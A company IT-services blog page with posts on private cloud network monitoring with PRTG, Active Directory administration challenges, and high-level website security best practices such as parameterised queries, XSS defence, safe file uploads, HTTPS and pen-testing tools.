Network Monitoring for the Private Cloud: A brief guide

3rd May 2018
|

Private Cloud Computing

‘Cloud computing’ as a concept has been around for over 10 years. Up until about 5 years ago many business and not for profit organisations shunned the “cloud” as all they could see were problems and challenges with the implementation of a cloud first policy such as – insufficient processor performance, enormous hardware costs and slow Internet connections making everyday use difficult.

However, today’s technology, broadband Internet connections and fast, inexpensive servers, provide the opportunity for businesses and not for profit IT teams to access only the services and storage space that are actually necessary, and adjust these to meet current needs. For many small and medium sized organisations using a virtual server, which is provided by a service provider, introduces a wide range of possibilities for cost savings, improved performance and higher data security. The goal of such cloud solutions is a consolidated IT environment that effectively absorbs fluctuation in demand and capitalizes on available resources.

The public cloud concept presents a number of challenges for a company’s IT department. Data security and the fear of ‘handing over’ control of the systems are significant issues. If an IT department is used to appropriating its systems with firewalls and to monitoring the availability, performance and capacity usage of its network infrastructure with a monitoring solution, it is much more difficult to implement both measures in the cloud. Of course, all large public cloud providers claim they offer appropriate security mechanisms and control systems, but the user must rely on the provider to guarantee constant access and to maintain data security.

Because of the challenges and general nervousness around data security in public clouds, many IT teams are investigating the creation of a ‘private cloud’ as an alternative to the use of public cloud. Private clouds enable staff and applications to access IT resources as they are required, while the private computing centre or a private server in a large data centre is running in the background. All services and resources used in a private cloud are found in defined systems that are only accessible to the user and are protected from external access.

Private clouds offer many of the advantages of cloud computing and at the same time minimise the risks. As opposed to many public clouds, the quality criteria for performance and availability in a private cloud can be customised, and compliance to these criteria can be monitored to make sure they are achieved.

Before moving to a private cloud, an IT department must consider the performance demands of individual applications and usage variations. Long-term analysis, trends and peak loads can be attained via extensive network monitoring evaluations, and resource availability can be planned according to demand. This is necessary to guarantee consistent IT performance across virtualized systems. However, a private cloud will only function if a fast, highly reliable network connects the physical servers. Therefore, the entire network infrastructure must be analysed in detail before setting up a private cloud. This network must satisfy the requirements relating to transmission speed and stability, otherwise hardware or network connections must be upgraded.

Ultimately, even minor losses in transmission speed can lead to extreme drops in performance. At Wanstor we recommend IT administrators use a comprehensive network monitoring solution like PRTG Network Monitor, in the planning of the private cloud. If an application (which usually equates to multiple virtualized servers) is going to be operated over multiple host servers (“cluster”) in the private cloud, the application will need to use Storage Area Networks (SANs), which convey data over the network as a central storage solution. This makes network performance monitoring even more important.

In terminal set ups in the 1980s, if a central computer broke down it was capable of paralyzing an entire company. The same scenario could happen if systems in the cloud fail. Current developments show that the world has gone through a phase of widely distributed computing and storage power (each workstation had a ‘full-blown’ PC) and returned to centralized IT concepts. The data is located in the cloud, and end devices are becoming more streamlined. The new cloud, therefore, complies with the old mainframe concept of centralized IT. The failure of a single VM in a highly-virtualized cloud environment can quickly interrupt access to 50 or 100 central applications. Modern clustering concepts are used to try to avoid these failures, but if a system fails despite these efforts, it must be dealt with immediately. If a host server crashes and pulls a large number of virtual machines down with it, or its network connection slows down or is interrupted, all virtualized services on this host are instantly affected, which, even with the best clustering concepts, often cannot be avoided.

A private cloud (like any other cloud) depends on the efficiency and dependability of the IT infrastructure. Physical or virtual server failures, connection interruptions and defective switches or routers can become expensive if they cause staff, automated production processes or online retailers to lose access to important operational IT functions.

This means a private cloud also presents new challenges to network monitoring. To make sure that users have constant access to remote business applications, the performance of the connection to the cloud must be monitored on every level and from every perspective.

At Wanstor we believe an appropriate network monitoring solution like PRTG accomplishes all of this with a central system; it notifies the IT administrator immediately in the event of possible disruptions within the private IT landscape both on location and in the private cloud, even if the private cloud is run in an external computing centre. A feature of private cloud monitoring is that external monitoring services cannot ‘look into’ the cloud, as it is private. An operator or client must therefore provide a monitoring solution within the private cloud and, as a result, the IT staff can monitor the private cloud more accurately and directly than a purchased service in the public cloud. A private cloud also enables unrestricted access when necessary. This allows the IT administrator to track the condition of all relevant systems directly with a private network monitoring solution. This encompasses monitoring of every individual virtual machine as well as the VMware host and all physical servers, firewalls, network connections, etc.

For comprehensive private cloud monitoring, the network monitoring should have the systems on the radar from user and server perspectives. If a company operates an extensive website with a web shop in a private cloud, for example, network monitoring could be set up as follows: A website operator aims to ensure that all functions are permanently available to all visitors, regardless of how this is realised technically. The following questions are especially relevant in this regard:

cloud-computing-lightbox

  • Is the website online?
  • Does the web server deliver the correct contents?
  • How fast does the site load?
  • Does the shopping cart process work?

These questions can only be answered if network monitoring takes place from outside the server in question. Ideally, network monitoring should be run outside the related computing centre, as well. It would therefore be suitable to set up a network monitoring solution on another cloud server or another computing centre.

It is crucial that all locations are reliable and a failover cluster supports monitoring so that interruption-free monitoring is guaranteed. This remote monitoring should include

  • Firewall, HTTP load balancer and Web server pinging
  • HTTP/HTTPS sensors
  • Monitoring loading time of the most important pages
  • Monitoring loading time of all assets of a page, including CSS, images, Flash, etc.
  • Checking whether pages contain specific words, e.g.: “Error”
  • Measuring loading time of downloads
  • HTTP transaction monitoring, for shopping process simulation
  • Sensors that monitor the remaining period of SSL certificate validity

If one of these sensors finds a problem, the network monitoring solution should send a notification to the IT administrator. Rule-based monitoring is helpful here. If a Ping sensor for the firewall, for example, times out, PRTG Network Monitor offers the possibility to pause all other sensors to avoid a flood of notifications, as, in this case, the connection to the private cloud is clearly completely disconnected.

Other questions are crucial for monitoring the (virtual) servers that are operating in the private cloud include:

  • Does the virtual server run flawlessly?
  • Do the internal data replication and load balancer work?
  • How high are the CPU usage and memory consumption?
  • Is sufficient storage space available?
  • Do email and DNS servers function flawlessly?

These questions cannot be answered with external network monitoring. Monitoring software must be running on the server or the monitoring tool must offer the possibility to monitor the server using remote probes. Such probes monitor the following parameters, for example, on each (virtual) server that runs in the private cloud, as well as on the host servers:

  • CPU usage
  • Memory usage (page files, swap file, page faults, etc.)
  • Network traffic
  • Hard drive access, free disc space and read/write times during disc access
  • Low-level system parameters (e.g.: length of processor queue, context switches)
  • Web server’s http response time Critical processes, like SQL servers or Web servers, are often monitored individually, in particular for CPU and memory usage.

In addition, the firewall condition (bandwidth use, CPU) can be monitored. If one of these measured variables lies outside of a defined range (e.g. CPU usage over 95% for more than two or five minutes), the monitoring solution will send notifications to the IT administrator.

Final thoughts

With the increasing use of cloud computing, IT system administrators are facing new challenges. A private cloud depends on the efficiency and dependability of the IT infrastructure. This means that the IT department must look into the capacity requirements of each application in the planning stages of the cloud in order to calculate resources to meet the demand. The connection to the cloud must be extensively monitored, as it is vital that the user has constant access to all applications during operation.

At the same time, smooth operation of all systems and connections within the private cloud must be guaranteed. A network monitoring solution should therefore monitor all services and resources from every perspective. This ensures continuous system availability.

For more information about Wanstor and PRTG network monitoring tools please visit – https://www.wanstor.com/paessler-prtg-network-monitor.htm

Read More

Overcoming Active Directory Administrator Challenges

23rd February 2018
|

Overcoming Active Directory Administrator Challenges

The central role of Active Directory in business environments

Deployment of and reliance upon Active Directory in the enterprise continues to grow at a rapid pace, and is more often becoming the central data storage point for sensitive user data as well as the gateway to critical business information. This provides businesses with a consolidated, integrated and distributed directory service, and enables the business to better manage user and administrative access to business applications and services.

Over the past 10+ years, Wanstor has seen Active Directory’s role in the enterprise drastically expand, as has the need to secure the data it both stores and enables access to. Unfortunately, native Active Directory administration tools provide little control over user and administrative permissions and access. The lack of control makes the secure administration of Active Directory a challenging task for IT administrators. In addition to limited control over what users and administrators can do within Active Directory, the database has limited ability in reporting on activities performed therein. This makes it very difficult to meet audit requirements, and to secure Active Directory. As a result, many businesses need assistance in creating repeatable, enforceable processes that will reduce their administrative overhead, whilst helping increase the availability and security of their systems.

Because Active Directory is an essential part of the IT infrastructure, IT teams must manage it both thoughtfully and diligently – controlling it, securing it and auditing it. Not surprisingly, with an application of this importance there are challenges to confront and resolve in reducing risk, whilst deriving maximum value for the business. This blog will examine some of the most challenging administrative tasks related to Active Directory.

Compliance Auditing and Reporting

To satisfy audit requirements, businesses must demonstrate control over the security of sensitive and business-critical data. However, without additional tools, demonstrating regulatory compliance with Active Directory is time-consuming, tedious and complex.

Auditors and stakeholders require detailed information about privileged-user activity. This level of granular information allows interested parties to troubleshoot problems and also provides information necessary to improve the performance and availability of Active Directory.

Auditing and reporting on Active Directory has always been a challenge. To more easily achieve, demonstrate and maintain compliance, businesses should employ a solution that provides robust, custom reporting and auditing capabilities. Reporting should provide information on what, when and where changes happen, and who made the changes.

Reporting capabilities should be flexible enough to provide graphical trend information for business stakeholders, while also providing granular detail necessary for administrators to improve their Active Directory deployment. Solutions should also securely store audit events for as long as necessary to meet data retention requirements and enable the easy search of these events.

Group Policy Management

Microsoft recommends that Group Policy be a cornerstone of Active Directory security. Leveraging the powerful capabilities of Group Policy, IT teams can manage and configure user and asset settings, applications and operating systems from a central console. It is an indispensable resource for managing user access, permissions and security settings in the Windows environment.

However maintaining a large number of Group Policy Objects (GPOs), which store policy settings, can be a challenging task. for example, Administrators should take special care in large IT environments with many system administrators, because making changes to GPOs can affect every computer or user in a domain in real time. However, Group Policy lacks true change-management and version-control capabilities. Due to the limited native controls available, accomplishing something as simple as deploying a shortcut requires writing a script. Custom scripts are often complex to create and difficult to debug and test. If the script fails or causes disruption in the live environment, there is no way to roll back to the last known setting or configuration. Malicious or unintended changes to Group Policy can have devastating and permanent effects on an IT environment and a business.

To prevent Group Policy changes that can negatively impact the business, IT teams often restrict administrative privilege to a few highly-skilled administrators. As a result, these staff members are overburdened with administering Group Policy rather than supporting the greater goals of the business. To leverage the powerful capabilities of Group Policy, it is necessary to have a solution in place that provides a secure offline repository to model and predict the impact of Group Policy changes before they go live. The ability to plan, control and troubleshoot Group Policy changes, with an approved change and release-management process, enables IT teams to improve the security and compliance of their Windows environment without making business-crippling administrative errors.

Businesses should also employ a solution for managing Group Policy that enables easy and flexible reporting to demonstrate that they’ve met audit requirements.

User Provisioning, Re-provisioning and De-provisioning

Most employees require access to several systems and applications, and each programme has its own account and login information. Even with today’s more advanced processes and systems, employees often find themselves waiting for days for access to the systems they need. This can cost businesses thousands of pounds in lost productivity and employee downtime.

To minimize workloads and expedite the provisioning process, many businesses view Active Directory to be the commanding data store for managing user account information and access rights to IT resources and assets. Provisioning, re-provisioning and de-provisioning access via Active Directory is often a manual process. In a large business, maintaining appropriate user permissions and access can be a time-consuming activity, especially when the business has significant personnel turnover. Systems administrators often spend hours creating, modifying and removing credentials. In a large, complex business, manual provisioning can take days. There are no automation or policy enforcement capabilities native to Active Directory. With little control in place, there is no way to make sure that users will receive the access they need when they need it.

Additionally, there is no system of checks and balances. Administrative errors can easily result in elevated user privileges that can lead to security breaches, malicious activity or unintended errors that can expose the business to significant risk. Businesses should look for an automated solution to execute provisioning activities. Implementing an automated solution with approval capabilities greatly reduces the burden on administrators, improves adherence to security policies, improves standards and decreases the time a user must wait for access. It also speeds up the removal of user access, which minimizes the ability of a user with malicious intent to access sensitive data.

Secure Delegation of User Privilege

Reducing the number of users with elevated administrative privileges is a constant challenge for the owners of Active Directory. Many user and helpdesk requests require interaction with Active Directory, but these common interactions often result in elevated access for users who do not need it to perform their jobs. Because there are only two levels of administrative access in Active Directory (Domain Administrator or Enterprise Administrator), it is very difficult to control what users can see and do once they gain administrative privileges.

Once a user has access to powerful administrative capabilities, they can easily access sensitive business and user information, elevate their privileges and even make changes within Active Directory. Elevated administrative privileges, especially when in the hands of someone with malicious intent, dramatically increase the risk exposure of Active Directory and the applications, users and systems that rely upon it. At Wanstor we have found through our years of experience of dealing with Active Directory that it is not uncommon for a business to discover that thousands of users have elevated administrative privileges. Each user with unauthorized administrative privileges presents a unique threat to the security of the IT infrastructure and business. Coupled with Active Directory’s latent vulnerabilities, it is easy for someone to make business-crippling administrative changes. When this occurs, troubleshooting becomes difficult, as auditing and reporting limitations make it nearly impossible to quickly gather a clear picture of the problem.

To reduce the risk associated with elevated user privilege and make sure that users only have access to the information they require, businesses should seek a solution that can securely delegate entitlements. This is a requirement to meet separation-of-duties mandates, as well as a way to share the administrative load by securely delegating privileges to subordinates.

Change Auditing and Monitoring

To achieve and maintain a secure and compliant IT environment, IT administrators must control change and monitor for unauthorized changes that may negatively impact their business. Active Directory change auditing is an important procedure for identifying and limiting errors and unauthorized changes to Active Directory configuration. One single change can put a business at risk, introducing security breaches and compliance issues.

Native Active Directory tools fail to proactively track, audit, report and alert administrators about vital configuration changes. Additionally, native real-time auditing and reporting on configuration changes, day-to-day operational changes and critical group changes do not exist. This exposes the business to risk, as the IT team’s ability to correct and limit damage is dependent on their ability to detect and troubleshoot a change once it has occurred.

A change that goes undetected can have a drastic impact on a business. E.g. someone who elevated their privileges and changed their identity to that of a senior member of the finance department could potentially access company funds resulting in theft, wire transfers and so forth. To reduce risk and help prevent security breaches, businesses should employ a solution that provides comprehensive change monitoring. This solution should include real-time change detection, intelligent notification, human-readable events, central auditing and detailed reporting. Employing a solution that encompasses all of these elements will enable IT teams to quickly and easily identify unauthorized changes, pinpoint their source, and resolve issues before they negatively impact the business.

Maintaining Data Integrity

It is important for businesses of all sizes to make sure that the data housed within Active Directory supports the needs of the business, especially as other applications rely on Active Directory for content and information.

Data integrity involves both the consistency of data and the completeness of information. For example, there are multiple ways to enter a phone number. Entering data in inconsistent formats creates data pollution. Data pollution inhibits the business from efficiently organizing and accessing important information. Another example of data inconsistency is the ability to abbreviate a department name. Think of the various ways to abbreviate “Accounting.” If there are inconsistencies in Active Directory’s data, there is no way to make sure that an administrator can group all the members of accounting together, which is necessary for payroll, communications, systems access and so on. Another vital aspect of data integrity when working with Active Directory is the completeness of information. Active Directory provides no control over content that is entered natively. If no controls are in place, administrators can enter information in any format they wish and leave fields that the business relies upon blank. To support and provide trustworthy information to all aspects of the business that rely on Active Directory, businesses should employ a solution that controls both the format and completeness of data entered in Active Directory. By putting these controls in place, IT teams can drastically reduce data pollution and significantly improve the uniformity and completeness of the content in Active Directory.

Self-Service Administration

Most requests made by the business or by users require access to and administration of Active Directory. This is often manual work and there are few controls in place to prevent administrative errors. Active Directory’s inherent complexity makes these errors common, and just one mistake could do damage to the entire security infrastructure. With the lack of controls, the business cannot have just anyone administering Active Directory.

While it may be practical to employ engineers and consultants to install and maintain Active Directory, businesses cannot afford to have their highly-skilled and valuable employees spending the majority of their time responding to relatively trivial user requests. Self-service administration and automation are logical solutions for businesses looking to streamline operations, become more efficient and improve compliance. This is achieved by placing controls around common administrative tasks and enabling the system to perform user requests without tasking highly skilled administrators.

Businesses should identify processes that are routine yet hands-on, and consider solutions that provide user self-service and automation of the process. Automation of these processes reduces the workload on highly-skilled administrators, it also improves compliance with policies since automation does not allow users to skip steps in the process. Businesses should also look for self-service and automation solutions that allow for approval and provide a comprehensive audit trail of events to help demonstrate policy compliance.

Final thoughts

Active Directory has found its home as a mission-critical component of the IT infrastructure. As businesses continue to leverage it for its powerful capabilities as a commanding repository, Active Directory is a vital part of enterprise security. Therefore, administrators must be able to control, monitor, administer and protect it with the same degree of discipline currently applied to other high-profile information such as credit card data, customer data and so forth. Because native tools do not enable or support the secure and disciplined administration of Active Directory, businesses must look for solutions that enable its controlled and efficient administration. These solutions help make sure the business information housed in Active Directory is both secure and appropriately serving the needs of the business.

Read More

A blog on Website Security

22nd February 2018
|

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office or ICO had to take its website down after a warning that hackers were taking control of visitor’s computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not to steal data or deface a website. Instead they are hacked to use servers as an email relay for spam, or to setup a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet in an attempt to exploit known website security issues in software. By following the tips below, your website should be able to operate in a safer way and put hackers and the tools they use off from attack.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies to both the server operating system and to any software you may be running on your website such as a CMS or forum. When holes are found in website security software, hackers are quick to attempt abuse. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this – unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues.  Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and security vulnerabilities appearing in a package you depend upon but aren’t paying any attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL, it is easy for such individuals to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example to disallow running of any scripts not hosted on your domain, disallow inline JavaScript. Mozilla have an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.

Server side validation

Validation should always be done both on the browser and server side. The browser can catch simple failures like mandatory fields which are empty and when you enter text into a numbers only field. These can however be bypassed, and you should make sure you check for these validation and deeper validation server side as failing to do so could lead to malicious code or scripting code being inserted into the database or could cause undesirable results in your website.

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords to your server and website admin area, but equally also important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and number will help to protect their information in the long run. Passwords should always be stored as encrypted values, preferably using a one way hashing algorithm. Using this method means when you are authenticating users you are only ever comparing encrypted values.

In the event of someone hacking in and stealing your passwords, using hashed passwords could help damage limitation, as decrypting them is not possible. The best someone can do is a dictionary attack or brute force attack, essentially guessing every combination until it finds a match.

Thankfully, many CMS’s provide user management out of the box with a lot of these website security features built in, although some configuration or extra modules might be required to use to set the minimum password strength. If you are using .NET then its worth using membership providers as they are very configurable, provide inbuilt website security and include readymade controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any file uploaded however innocent it may look, could contain a script that when executed on your server completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the mime type to verify that the file is an image as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size are not fool proof. Most images formats allow storing a comment section which could contain PHP code that could be executed by the server.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension as a file with the name image.jpg.php has been known to get through. Some options are to rename the file on upload to make sure ensure the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files. This way, any files uploaded to your website are stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. Image tags support an src attribute that is not a direct URL to an image, so your src attribute can point to your file delivery script providing you set the correct content type in the HTTP header.

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are few things you will want to check. E.g. Make sure you have a firewall setup, and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet only use secure transport methods to your server such as SFTP or SSH. Where possible have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world, only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees users that they’re communicating with the server that they should be, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS in delivering it. That of course means credit card and login pages. A login form will often set a cookie for example, which is sent with every other request to your site that a logged in user makes, and is used to authenticate those requests. An attacker stealing this would be able to perfectly imitate a user and take over their login session. To defeat these kind of attacks, you almost always want to use HTTPS for your entire site.

Website security tools

Once you think you have done all you can, then it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing or pen testing for short. There are many commercial and free products to assist you in this. They work on a similar basis to scripts hackers will use in that they test all know exploits and attempt to compromise your site using some of the previous mentioned methods such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scans over 25,000. But it can be difficult to setup and requires a OpenVAS server to be installed which only runs on *nix. OpenVAS was fork of Nessus before it became a closed-source commercial product.
  • io is a tool offering a free online check to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further then there are some further steps you can take to manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged in user then try changing URL parameters such as user id, or cookie values in an attempt to view details of another user. Another area worth testing are forms, changing the POST values to attempt to submit code to perform XSS or to upload a server side script.

Hopefully these tips will help keep your site and information safe. Thankfully most Content Management Systems have inbuilt website security features; it is a still a good idea to have knowledge of the most common security exploits, so you can make sure that you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm

Read More

Storage and Backup Peace of Mind

26th August 2016
|

Data Storage Backup Peace of Mind Business

The ongoing issue with your storage is that, as a modern organisation, you continue to generate more and more data in ever greater quantities. That data needs to be stored and be accessible “on demand”, as well as being securely backed up. By implementing a data storage and backup solution that allows you to smoothly scale your storage in an easily manageable and non-disruptive manner, you get the peace of mind that you need knowing that your data is safe.

Read More
Wanstor
124-126 Borough High Street London, SE1 1LB
Phone: 0333 123 0360, 020 7592 7860
IT Support London from Wanstor IT Support London